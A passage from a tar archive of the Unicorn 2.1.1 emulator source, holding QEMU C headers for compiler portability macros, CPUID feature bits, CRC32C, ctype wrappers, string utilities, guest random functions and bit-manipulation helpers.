v) { stq_he_p(ptr, be_bswap(v, 64)); } /* float access */ static inline float32 ldfl_be_p(const void *ptr) { CPU_FloatU u; u.l = ldl_be_p(ptr); return u.f; } static inline void stfl_be_p(void *ptr, float32 v) { CPU_FloatU u; u.f = v; stl_be_p(ptr, u.l); } static inline float64 ldfq_be_p(const void *ptr) { CPU_DoubleU u; u.ll = ldq_be_p(ptr); return u.d; } static inline void stfq_be_p(void *ptr, float64 v) { CPU_DoubleU u; u.d = v; stq_be_p(ptr, u.ll); } static inline unsigned long leul_to_cpu(unsigned long v) { #if HOST_LONG_BITS == 32 return le_bswap(v, 32); #elif HOST_LONG_BITS == 64 return le_bswap(v, 64); #else # error Unknown sizeof long #endif } /* Store v to p as a sz byte value in host order */ #define DO_STN_LDN_P(END) \ static inline void stn_## END ## _p(void *ptr, int sz, uint64_t v) \ { \ switch (sz) { \ case 1: \ stb_p(ptr, v); \ break; \ case 2: \ stw_ ## END ## _p(ptr, v); \ break; \ case 4: \ stl_ ## END ## _p(ptr, v); \ break; \ case 8: \ stq_ ## END ## _p(ptr, v); \ break; \ default: \ break; /* g_assert_not_reached(); */ \ } \ } \ static inline uint64_t ldn_## END ## _p(const void *ptr, int sz) \ { \ switch (sz) { \ case 1: \ return ldub_p(ptr); \ case 2: \ return lduw_ ## END ## _p(ptr); \ case 4: \ return (uint32_t)ldl_ ## END ## _p(ptr); \ case 8: \ return ldq_ ## END ## _p(ptr); \ default: \ return 0; /* g_assert_not_reached(); */ \ } \ } DO_STN_LDN_P(he) DO_STN_LDN_P(le) DO_STN_LDN_P(be) #undef DO_STN_LDN_P #undef le_bswap #undef be_bswap #undef le_bswaps #undef be_bswaps #endif /* BSWAP_H */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/compiler.h����������������������������������������������������������0000664�0000000�0000000�00000025143�14675241067�0020535�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* compiler.h: macros to abstract away compiler specifics * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef COMPILER_H #define COMPILER_H #include "unicorn/platform.h" #ifndef glue #define xglue(x, y) x ## y #define glue(x, y) xglue(x, y) #define stringify(s) tostring(s) #define tostring(s) #s #endif #ifdef _MSC_VER // MSVC support #define inline __inline #define __func__ __FUNCTION__ #include <math.h> #include <float.h> #if _MSC_VER < MSC_VER_VS2013 #define isinf(x) (!_finite(x)) #if defined(_WIN64) #define isnan _isnanf #else #define isnan _isnan #endif #endif /* gcc __builtin___clear_cache() */ static inline void __builtin___clear_cache(void *beg, void *e) { unsigned char *start = beg; unsigned char *end = e; FlushInstructionCache(GetCurrentProcess(), start, end - start); } static inline double rint( double x ) { return floor(x < 0 ? x - 0.5 : x + 0.5); } union MSVC_FLOAT_HACK { unsigned char Bytes[4]; float Value; }; #ifndef NAN static union MSVC_FLOAT_HACK __NAN = {{0x00, 0x00, 0xC0, 0x7F}}; #define NAN (__NAN.Value) #endif #define QEMU_DIV0 __pragma(warning(suppress:2124)) // divide by zero error #define QEMU_GNUC_PREREQ(maj, min) 0 #define QEMU_NORETURN __declspec(noreturn) #define QEMU_UNUSED_VAR __pragma(warning(suppress:4100)) // unused variables only #define QEMU_UNUSED_FUNC #define QEMU_WARN_UNUSED_RESULT #define QEMU_ARTIFICIAL #define QEMU_PACK( __Declaration__ ) __pragma( pack(push, 1) ) __Declaration__ __pragma( pack(pop) ) #define QEMU_NOINLINE __declspec(noinline) #define QEMU_ALIGN(A, B) __declspec(align(A)) B #define QEMU_ALIGNED(X) #define cat(x,y) x ## y #define cat2(x,y) cat(x,y) #define QEMU_BUILD_BUG_ON(x) #define QEMU_BUILD_BUG_ON_ZERO(x) #define QEMU_BUILD_BUG_MSG(x, msg) #define GCC_FMT_ATTR(n, m) #define likely(x) (x) #define unlikely(x) (x) #define container_of(ptr, type, member) ((type *)((char *)(ptr) - offsetof(type, member))) #define QEMU_FLATTEN #define QEMU_ALWAYS_INLINE __declspec(inline) #else // Unix compilers #ifndef NAN #define NAN (0.0 / 0.0) #endif #if defined __clang_analyzer__ || defined __COVERITY__ #define QEMU_STATIC_ANALYSIS 1 #endif /*---------------------------------------------------------------------------- | The macro QEMU_GNUC_PREREQ tests for minimum version of the GNU C compiler. | The code is a copy of SOFTFLOAT_GNUC_PREREQ, see softfloat-macros.h. *----------------------------------------------------------------------------*/ #if defined(__GNUC__) && defined(__GNUC_MINOR__) # define QEMU_GNUC_PREREQ(maj, min) \ ((__GNUC__ << 16) + __GNUC_MINOR__ >= ((maj) << 16) + (min)) #else # define QEMU_GNUC_PREREQ(maj, min) 0 #endif #define QEMU_NORETURN __attribute__ ((__noreturn__)) #define QEMU_UNUSED_VAR __attribute__((unused)) #define QEMU_UNUSED_FUNC __attribute__((unused)) #define QEMU_WARN_UNUSED_RESULT __attribute__((warn_unused_result)) #define QEMU_SENTINEL __attribute__((sentinel)) #if defined(_WIN32) && (defined(__x86_64__) || defined(__i386__)) # define QEMU_PACKED __attribute__((gcc_struct, packed)) # define QEMU_PACK( __Declaration__ ) __Declaration__ __attribute__((gcc_struct, packed)) #else # define QEMU_PACKED __attribute__((packed)) # define QEMU_PACK( __Declaration__ ) __Declaration__ __attribute__((packed)) #endif #define QEMU_ALIGN(A, B) B __attribute__((aligned(A))) #define QEMU_ALIGNED(X) __attribute__((aligned(X))) #define QEMU_NOINLINE __attribute__((noinline)) #ifndef likely #if __GNUC__ < 3 #define __builtin_expect(x, n) (x) #endif #define likely(x) __builtin_expect(!!(x), 1) #define unlikely(x) __builtin_expect(!!(x), 0) #endif #ifndef container_of #define container_of(ptr, type, member) ({ \ const typeof(((type *) 0)->member) *__mptr = (ptr); \ (type *) ((char *) __mptr - offsetof(type, member));}) #endif #define sizeof_field(type, field) sizeof(((type *)0)->field) /* * Calculate the number of bytes up to and including the given 'field' of * 'container'. */ #define endof(container, field) \ (offsetof(container, field) + sizeof_field(container, field)) /* Convert from a base type to a parent type, with compile time checking. */ #ifdef __GNUC__ #define DO_UPCAST(type, field, dev) ( __extension__ ( { \ char __attribute__((unused)) offset_must_be_zero[ \ -offsetof(type, field)]; \ container_of(dev, type, field);})) #else #define DO_UPCAST(type, field, dev) container_of(dev, type, field) #endif #define typeof_field(type, field) typeof(((type *)0)->field) #define type_check(t1,t2) ((t1*)0 - (t2*)0) #define QEMU_BUILD_BUG_ON_STRUCT(x) \ struct { \ int:(x) ? -1 : 1; \ } /* QEMU_BUILD_BUG_MSG() emits the message given if _Static_assert is * supported; otherwise, it will be omitted from the compiler error * message (but as it remains present in the source code, it can still * be useful when debugging). */ #if defined(CONFIG_STATIC_ASSERT) #define QEMU_BUILD_BUG_MSG(x, msg) _Static_assert(!(x), msg) #elif defined(__COUNTER__) #define QEMU_BUILD_BUG_MSG(x, msg) typedef QEMU_BUILD_BUG_ON_STRUCT(x) \ glue(qemu_build_bug_on__, __COUNTER__) __attribute__((unused)) #else #define QEMU_BUILD_BUG_MSG(x, msg) #endif #define QEMU_BUILD_BUG_ON(x) QEMU_BUILD_BUG_MSG(x, "not expecting: " #x) #define QEMU_BUILD_BUG_ON_ZERO(x) (sizeof(QEMU_BUILD_BUG_ON_STRUCT(x)) - \ sizeof(QEMU_BUILD_BUG_ON_STRUCT(x))) #if defined __GNUC__ # if !QEMU_GNUC_PREREQ(4, 4) /* gcc versions before 4.4.x don't support gnu_printf, so use printf. */ # define GCC_FMT_ATTR(n, m) __attribute__((format(printf, n, m))) # else /* Use gnu_printf when supported (qemu uses standard format strings). */ # define GCC_FMT_ATTR(n, m) __attribute__((format(gnu_printf, n, m))) # if defined(_WIN32) /* Map __printf__ to __gnu_printf__ because we want standard format strings * even when MinGW or GLib include files use __printf__. */ # define __printf__ __gnu_printf__ # endif # endif #else #define GCC_FMT_ATTR(n, m) #endif #ifndef __has_warning #define __has_warning(x) 0 /* compatibility with non-clang compilers */ #endif #ifndef __has_feature #define __has_feature(x) 0 /* compatibility with non-clang compilers */ #endif #ifndef __has_builtin #define __has_builtin(x) 0 /* compatibility with non-clang compilers */ #endif #if __has_builtin(__builtin_assume_aligned) || !defined(__clang__) #define HAS_ASSUME_ALIGNED #endif #ifndef __has_attribute #define __has_attribute(x) 0 /* compatibility with older GCC */ #endif /* * GCC doesn't provide __has_attribute() until GCC 5, but we know all the GCC * versions we support have the "flatten" attribute. Clang may not have the * "flatten" attribute but always has __has_attribute() to check for it. */ #if __has_attribute(flatten) || !defined(__clang__) # define QEMU_FLATTEN __attribute__((flatten)) #else # define QEMU_FLATTEN #endif /* * If __attribute__((error)) is present, use it to produce an error at * compile time. Otherwise, one must wait for the linker to diagnose * the missing symbol. */ #if __has_attribute(error) # define QEMU_ERROR(X) __attribute__((error(X))) #else # define QEMU_ERROR(X) #endif /* * The nonstring variable attribute specifies that an object or member * declaration with type array of char or pointer to char is intended * to store character arrays that do not necessarily contain a terminating * NUL character. This is useful in detecting uses of such arrays or pointers * with functions that expect NUL-terminated strings, and to avoid warnings * when such an array or pointer is used as an argument to a bounded string * manipulation function such as strncpy. */ #if __has_attribute(nonstring) # define QEMU_NONSTRING __attribute__((nonstring)) #else # define QEMU_NONSTRING #endif /* * Forced inlining may be desired to encourage constant propagation * of function parameters. However, it can also make debugging harder, * so disable it for a non-optimizing build. */ #if defined(__OPTIMIZE__) #define QEMU_ALWAYS_INLINE __attribute__((always_inline)) #else #define QEMU_ALWAYS_INLINE #endif /* Implement C11 _Generic via GCC builtins. Example: * * QEMU_GENERIC(x, (float, sinf), (long double, sinl), sin) (x) * * The first argument is the discriminator. The last is the default value. * The middle ones are tuples in "(type, expansion)" format. */ /* First, find out the number of generic cases. */ #define QEMU_GENERIC(x, ...) \ QEMU_GENERIC_(typeof(x), __VA_ARGS__, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0) /* There will be extra arguments, but they are not used. */ #define QEMU_GENERIC_(x, a0, a1, a2, a3, a4, a5, a6, a7, a8, a9, count, ...) \ QEMU_GENERIC##count(x, a0, a1, a2, a3, a4, a5, a6, a7, a8, a9) /* Two more helper macros, this time to extract items from a parenthesized * list. */ #define QEMU_FIRST_(a, b) a #define QEMU_SECOND_(a, b) b /* ... and a final one for the common part of the "recursion". */ #define QEMU_GENERIC_IF(x, type_then, else_) \ __builtin_choose_expr(__builtin_types_compatible_p(x, \ QEMU_FIRST_ type_then), \ QEMU_SECOND_ type_then, else_) /* CPP poor man's "recursion". */ #define QEMU_GENERIC1(x, a0, ...) (a0) #define QEMU_GENERIC2(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC1(x, __VA_ARGS__)) #define QEMU_GENERIC3(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC2(x, __VA_ARGS__)) #define QEMU_GENERIC4(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC3(x, __VA_ARGS__)) #define QEMU_GENERIC5(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC4(x, __VA_ARGS__)) #define QEMU_GENERIC6(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC5(x, __VA_ARGS__)) #define QEMU_GENERIC7(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC6(x, __VA_ARGS__)) #define QEMU_GENERIC8(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC7(x, __VA_ARGS__)) #define QEMU_GENERIC9(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC8(x, __VA_ARGS__)) #define QEMU_GENERIC10(x, a0, ...) QEMU_GENERIC_IF(x, a0, QEMU_GENERIC9(x, __VA_ARGS__)) /** * qemu_build_not_reached() * * The compiler, during optimization, is expected to prove that a call * to this function cannot be reached and remove it. If the compiler * supports QEMU_ERROR, this will be reported at compile time; otherwise * this will be reported at link time due to the missing symbol. */ #if defined(__OPTIMIZE__) && !defined(__NO_INLINE__) extern void QEMU_NORETURN QEMU_ERROR("code path is reachable") qemu_build_not_reached(void); #else #define qemu_build_not_reached() g_assert_not_reached() #endif #endif // _MSC_VER #endif /* COMPILER_H */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/cpuid.h�������������������������������������������������������������0000664�0000000�0000000�00000002471�14675241067�0020026�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* cpuid.h: Macros to identify the properties of an x86 host. * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef QEMU_CPUID_H #define QEMU_CPUID_H #ifndef CONFIG_CPUID_H # error "<cpuid.h> is unusable with this compiler" #endif #ifdef _MSC_VER #include <intrin.h> #else #include <cpuid.h> #endif /* Cover the uses that we have within qemu. */ /* ??? Irritating that we have the same information in target/i386/. */ /* Leaf 1, %edx */ #ifndef bit_CMOV #define bit_CMOV (1 << 15) #endif #ifndef bit_SSE2 #define bit_SSE2 (1 << 26) #endif #ifndef bit_POPCNT #define bit_POPCNT (1 << 23) #endif /* Leaf 1, %ecx */ #ifndef bit_SSE4_1 #define bit_SSE4_1 (1 << 19) #endif #ifndef bit_MOVBE #define bit_MOVBE (1 << 22) #endif #ifndef bit_OSXSAVE #define bit_OSXSAVE (1 << 27) #endif #ifndef bit_AVX #define bit_AVX (1 << 28) #endif /* Leaf 7, %ebx */ #ifndef bit_BMI #define bit_BMI (1 << 3) #endif #ifndef bit_AVX2 #define bit_AVX2 (1 << 5) #endif #ifndef bit_AVX512F #define bit_AVX512F (1 << 16) #endif #ifndef bit_BMI2 #define bit_BMI2 (1 << 8) #endif /* Leaf 0x80000001, %ecx */ #ifndef bit_LZCNT #define bit_LZCNT (1 << 5) #endif #endif /* QEMU_CPUID_H */ �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/crc32c.h������������������������������������������������������������0000664�0000000�0000000�00000002057�14675241067�0020001�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Castagnoli CRC32C Checksum Algorithm * * Polynomial: 0x11EDC6F41 * * Castagnoli93: Guy Castagnoli and Stefan Braeuer and Martin Herrman * "Optimization of Cyclic Redundancy-Check Codes with 24 * and 32 Parity Bits",IEEE Transactions on Communication, * Volume 41, Number 6, June 1993 * * Copyright (c) 2013 Red Hat, Inc., * * Authors: * Jeff Cody <jcody@redhat.com> * * Based on the Linux kernel cryptographic crc32c module, * * Copyright (c) 2004 Cisco Systems, Inc. * Copyright (c) 2008 Herbert Xu <herbert@gondor.apana.org.au> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. * */ #ifndef QEMU_CRC32C_H #define QEMU_CRC32C_H uint32_t crc32c(uint32_t crc, const uint8_t *data, unsigned int length); uint32_t crc32(uint32_t crc, const uint8_t *data, unsigned int length); #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/ctype.h�������������������������������������������������������������0000664�0000000�0000000�00000002130�14675241067�0020036�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef QEMU_CTYPE_H #define QEMU_CTYPE_H #define qemu_isalnum(c) isalnum((unsigned char)(c)) #define qemu_isalpha(c) isalpha((unsigned char)(c)) #define qemu_iscntrl(c) iscntrl((unsigned char)(c)) #define qemu_isdigit(c) isdigit((unsigned char)(c)) #define qemu_isgraph(c) isgraph((unsigned char)(c)) #define qemu_islower(c) islower((unsigned char)(c)) #define qemu_isprint(c) isprint((unsigned char)(c)) #define qemu_ispunct(c) ispunct((unsigned char)(c)) #define qemu_isspace(c) isspace((unsigned char)(c)) #define qemu_isupper(c) isupper((unsigned char)(c)) #define qemu_isxdigit(c) isxdigit((unsigned char)(c)) #define qemu_tolower(c) tolower((unsigned char)(c)) #define qemu_toupper(c) toupper((unsigned char)(c)) #define qemu_isascii(c) isascii((unsigned char)(c)) #define qemu_toascii(c) toascii((unsigned char)(c)) #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/cutils.h������������������������������������������������������������0000664�0000000�0000000�00000002475�14675241067�0020231�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_CUTILS_H #define QEMU_CUTILS_H /** * pstrcpy: * @buf: buffer to copy string into * @buf_size: size of @buf in bytes * @str: string to copy * * Copy @str into @buf, including the trailing NUL, but do not * write more than @buf_size bytes. The resulting buffer is * always NUL terminated (even if the source string was too long). * If @buf_size is zero or negative then no bytes are copied. * * This function is similar to strncpy(), but avoids two of that * function's problems: * * if @str fits in the buffer, pstrcpy() does not zero-fill the * remaining space at the end of @buf * * if @str is too long, pstrcpy() will copy the first @buf_size-1 * bytes and then add a NUL */ void pstrcpy(char *buf, int buf_size, const char *str); /** * pstrcat: * @buf: buffer containing existing string * @buf_size: size of @buf in bytes * @s: string to concatenate to @buf * * Append a copy of @s to the string already in @buf, but do not * allow the buffer to overflow. If the existing contents of @buf * plus @str would total more than @buf_size bytes, then write * as much of @str as will fit followed by a NUL terminator. * * @buf must already contain a NUL-terminated string, or the * behaviour is undefined. * * Returns: @buf. */ char *pstrcat(char *buf, int buf_size, const char *s); #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/guest-random.h������������������������������������������������������0000664�0000000�0000000�00000003264�14675241067�0021330�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU guest-visible random functions * * Copyright 2019 Linaro, Ltd. * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. */ #ifndef QEMU_GUEST_RANDOM_H #define QEMU_GUEST_RANDOM_H /** * qemu_guest_random_seed_thread_part1(void) * * If qemu_getrandom is in deterministic mode, returns an * independent seed for the new thread. Otherwise returns 0. */ uint64_t qemu_guest_random_seed_thread_part1(void); /** * qemu_guest_random_seed_thread_part2(uint64_t seed) * @seed: a value for the new thread. * * If qemu_guest_getrandom is in deterministic mode, this stores an * independent seed for the new thread. Otherwise a no-op. */ void qemu_guest_random_seed_thread_part2(uint64_t seed); /** * qemu_guest_getrandom(void *buf, size_t len, Error **errp) * @buf: a buffer of bytes to be written * @len: the number of bytes in @buf * @errp: an error indicator * * Fills len bytes in buf with random data. This should only be used * for data presented to the guest. Host-side crypto services should * use qcrypto_random_bytes. * * Returns 0 on success, < 0 on failure while setting *errp. */ int qemu_guest_getrandom(void *buf, size_t len); /** * qemu_guest_getrandom_nofail(void *buf, size_t len) * @buf: a buffer of bytes to be written * @len: the number of bytes in @buf * * Like qemu_guest_getrandom, but will assert for failure. * Use this when there is no reasonable recovery. */ void qemu_guest_getrandom_nofail(void *buf, size_t len); #endif /* QEMU_GUEST_RANDOM_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/host-utils.h��������������������������������������������������������0000664�0000000�0000000�00000034433�14675241067�0021040�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Utility compute operations used by translated code. * * Copyright (c) 2007 Thiemo Seufer * Copyright (c) 2007 Jocelyn Mayer * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef HOST_UTILS_H #define HOST_UTILS_H #include "qemu/bswap.h" #include "qemu/int128.h" #ifdef CONFIG_INT128 static inline void mulu64(uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) { __uint128_t r = (__uint128_t)a * b; *plow = r; *phigh = r >> 64; } static inline void muls64(uint64_t *plow, uint64_t *phigh, int64_t a, int64_t b) { __int128_t r = (__int128_t)a * b; *plow = r; *phigh = r >> 64; } /* compute with 96 bit intermediate result: (a*b)/c */ static inline uint64_t muldiv64(uint64_t a, uint32_t b, uint32_t c) { #if defined(_MSC_VER) && defined(__clang__) union { uint64_t ll; struct { #ifdef HOST_WORDS_BIGENDIAN uint32_t high, low; #else uint32_t low, high; #endif } l; } u, res; uint64_t rl, rh; u.ll = a; rl = (uint64_t)u.l.low * (uint64_t)b; rh = (uint64_t)u.l.high * (uint64_t)b; rh += (rl >> 32); res.l.high = rh / c; res.l.low = (((rh % c) << 32) + (rl & 0xffffffff)) / c; return res.ll; #else return (__int128_t)a * b / c; #endif } static inline int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor) { if (divisor == 0) { return 1; } else { __uint128_t dividend = ((__uint128_t)*phigh << 64) | *plow; __uint128_t result = dividend / divisor; *plow = result; *phigh = dividend % divisor; return result > UINT64_MAX; } } static inline int divs128(int64_t *plow, int64_t *phigh, int64_t divisor) { if (divisor == 0) { return 1; } else { __int128_t dividend = ((__int128_t)*phigh << 64) | *plow; __int128_t result = dividend / divisor; *plow = result; *phigh = dividend % divisor; return result != *plow; } } #else void muls64(uint64_t *phigh, uint64_t *plow, int64_t a, int64_t b); void mulu64(uint64_t *phigh, uint64_t *plow, uint64_t a, uint64_t b); int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor); int divs128(int64_t *plow, int64_t *phigh, int64_t divisor); static inline uint64_t muldiv64(uint64_t a, uint32_t b, uint32_t c) { union { uint64_t ll; struct { #ifdef HOST_WORDS_BIGENDIAN uint32_t high, low; #else uint32_t low, high; #endif } l; } u, res; uint64_t rl, rh; u.ll = a; rl = (uint64_t)u.l.low * (uint64_t)b; rh = (uint64_t)u.l.high * (uint64_t)b; rh += (rl >> 32); res.l.high = rh / c; res.l.low = (((rh % c) << 32) + (rl & 0xffffffff)) / c; return res.ll; } #endif /** * clz32 - count leading zeros in a 32-bit value. * @val: The value to search * * Returns 32 if the value is zero. Note that the GCC builtin is * undefined if the value is zero. */ static inline int clz32(uint32_t val) { #ifndef _MSC_VER return val ? __builtin_clz(val) : 32; #else /* Binary search for the leading one bit. */ int cnt = 0; if (!(val & 0xFFFF0000U)) { cnt += 16; val <<= 16; } if (!(val & 0xFF000000U)) { cnt += 8; val <<= 8; } if (!(val & 0xF0000000U)) { cnt += 4; val <<= 4; } if (!(val & 0xC0000000U)) { cnt += 2; val <<= 2; } if (!(val & 0x80000000U)) { cnt++; val <<= 1; } if (!(val & 0x80000000U)) { cnt++; } return cnt; #endif } /** * clo32 - count leading ones in a 32-bit value. * @val: The value to search * * Returns 32 if the value is -1. */ static inline int clo32(uint32_t val) { return clz32(~val); } /** * clz64 - count leading zeros in a 64-bit value. * @val: The value to search * * Returns 64 if the value is zero. Note that the GCC builtin is * undefined if the value is zero. */ static inline int clz64(uint64_t val) { #ifndef _MSC_VER return val ? __builtin_clzll(val) : 64; #else int cnt = 0; if (!(val >> 32)) { cnt += 32; } else { val >>= 32; } return cnt + clz32((uint32_t)val); #endif } /** * clo64 - count leading ones in a 64-bit value. * @val: The value to search * * Returns 64 if the value is -1. */ static inline int clo64(uint64_t val) { return clz64(~val); } /** * ctz32 - count trailing zeros in a 32-bit value. * @val: The value to search * * Returns 32 if the value is zero. Note that the GCC builtin is * undefined if the value is zero. */ static inline int ctz32(uint32_t val) { #ifndef _MSC_VER return val ? __builtin_ctz(val) : 32; #else /* Binary search for the trailing one bit. */ int cnt; cnt = 0; if (!(val & 0x0000FFFFUL)) { cnt += 16; val >>= 16; } if (!(val & 0x000000FFUL)) { cnt += 8; val >>= 8; } if (!(val & 0x0000000FUL)) { cnt += 4; val >>= 4; } if (!(val & 0x00000003UL)) { cnt += 2; val >>= 2; } if (!(val & 0x00000001UL)) { cnt++; val >>= 1; } if (!(val & 0x00000001UL)) { cnt++; } return cnt; #endif } /** * cto32 - count trailing ones in a 32-bit value. * @val: The value to search * * Returns 32 if the value is -1. */ static inline int cto32(uint32_t val) { return ctz32(~val); } /** * ctz64 - count trailing zeros in a 64-bit value. * @val: The value to search * * Returns 64 if the value is zero. Note that the GCC builtin is * undefined if the value is zero. */ static inline int ctz64(uint64_t val) { #ifndef _MSC_VER return val ? __builtin_ctzll(val) : 64; #else int cnt; cnt = 0; if (!((uint32_t)val)) { cnt += 32; val >>= 32; } return cnt + ctz32((uint32_t)val); #endif } /** * cto64 - count trailing ones in a 64-bit value. * @val: The value to search * * Returns 64 if the value is -1. */ static inline int cto64(uint64_t val) { return ctz64(~val); } /** * clrsb32 - count leading redundant sign bits in a 32-bit value. * @val: The value to search * * Returns the number of bits following the sign bit that are equal to it. * No special cases; output range is [0-31]. */ static inline int clrsb32(uint32_t val) { #if !defined(_MSC_VER) && !defined(__clang__) return __builtin_clrsb(val); #else return clz32(val ^ ((int32_t)val >> 1)) - 1; #endif } /** * clrsb64 - count leading redundant sign bits in a 64-bit value. * @val: The value to search * * Returns the number of bits following the sign bit that are equal to it. * No special cases; output range is [0-63]. */ static inline int clrsb64(uint64_t val) { #if !defined(_MSC_VER) && !defined(__clang__) return __builtin_clrsbll(val); #else return clz64(val ^ ((int64_t)val >> 1)) - 1; #endif } /** * ctpop8 - count the population of one bits in an 8-bit value. * @val: The value to search */ static inline int ctpop8(uint8_t val) { #ifndef _MSC_VER return __builtin_popcount(val); #else val = (val & 0x55) + ((val >> 1) & 0x55); val = (val & 0x33) + ((val >> 2) & 0x33); val = (val & 0x0f) + ((val >> 4) & 0x0f); return val; #endif } /** * ctpop16 - count the population of one bits in a 16-bit value. * @val: The value to search */ static inline int ctpop16(uint16_t val) { #ifndef _MSC_VER return __builtin_popcount(val); #else val = (val & 0x5555) + ((val >> 1) & 0x5555); val = (val & 0x3333) + ((val >> 2) & 0x3333); val = (val & 0x0f0f) + ((val >> 4) & 0x0f0f); val = (val & 0x00ff) + ((val >> 8) & 0x00ff); return val; #endif } /** * ctpop32 - count the population of one bits in a 32-bit value. * @val: The value to search */ static inline int ctpop32(uint32_t val) { #ifndef _MSC_VER return __builtin_popcount(val); #else val = (val & 0x55555555) + ((val >> 1) & 0x55555555); val = (val & 0x33333333) + ((val >> 2) & 0x33333333); val = (val & 0x0f0f0f0f) + ((val >> 4) & 0x0f0f0f0f); val = (val & 0x00ff00ff) + ((val >> 8) & 0x00ff00ff); val = (val & 0x0000ffff) + ((val >> 16) & 0x0000ffff); return val; #endif } /** * ctpop64 - count the population of one bits in a 64-bit value. * @val: The value to search */ static inline int ctpop64(uint64_t val) { #ifndef _MSC_VER return __builtin_popcountll(val); #else val = (val & 0x5555555555555555ULL) + ((val >> 1) & 0x5555555555555555ULL); val = (val & 0x3333333333333333ULL) + ((val >> 2) & 0x3333333333333333ULL); val = (val & 0x0f0f0f0f0f0f0f0fULL) + ((val >> 4) & 0x0f0f0f0f0f0f0f0fULL); val = (val & 0x00ff00ff00ff00ffULL) + ((val >> 8) & 0x00ff00ff00ff00ffULL); val = (val & 0x0000ffff0000ffffULL) + ((val >> 16) & 0x0000ffff0000ffffULL); val = (val & 0x00000000ffffffffULL) + ((val >> 32) & 0x00000000ffffffffULL); return (int)val; #endif } /** * revbit8 - reverse the bits in an 8-bit value. * @x: The value to modify. */ static inline uint8_t revbit8(uint8_t x) { /* Assign the correct nibble position. */ x = ((x & 0xf0) >> 4) | ((x & 0x0f) << 4); /* Assign the correct bit position. */ x = ((x & 0x88) >> 3) | ((x & 0x44) >> 1) | ((x & 0x22) << 1) | ((x & 0x11) << 3); return x; } /** * revbit16 - reverse the bits in a 16-bit value. * @x: The value to modify. */ static inline uint16_t revbit16(uint16_t x) { /* Assign the correct byte position. */ x = bswap16(x); /* Assign the correct nibble position. */ x = ((x & 0xf0f0) >> 4) | ((x & 0x0f0f) << 4); /* Assign the correct bit position. */ x = ((x & 0x8888) >> 3) | ((x & 0x4444) >> 1) | ((x & 0x2222) << 1) | ((x & 0x1111) << 3); return x; } /** * revbit32 - reverse the bits in a 32-bit value. * @x: The value to modify. */ static inline uint32_t 